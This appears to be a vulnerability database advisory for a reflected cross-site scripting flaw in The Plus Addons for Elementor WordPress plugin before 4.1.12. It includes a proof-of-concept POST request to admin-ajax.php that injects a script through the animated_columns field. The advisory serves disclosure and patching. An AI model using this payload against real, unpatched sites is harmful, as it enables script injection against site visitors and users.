WordPress Plugin Vulnerabilities
The Plus Addons for Elementor < 4.1.12 - Reflected Cross-Site Scripting (XSS)
Description
The theplus_more_post AJAX action of the plugin did not properly sanitise some of its fields, leading to a reflected Cross-Site Scripting (exploitable on both unauthenticated and authenticated users)
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 174 Connection: close action=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(%2fXSS%2f)%3c%2fscript%3e
Affects Plugins
Fixed in version 4.1.12
References
Classification
Miscellaneous
Original Researcher
Nicolas VERDIER from TEHTRIS
Submitter
Nicolas VERDIER from TEHTRIS
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-05-31 (about 2 years ago)
Added
2021-05-31 (about 2 years ago)
Last Updated
2021-06-01 (about 2 years ago)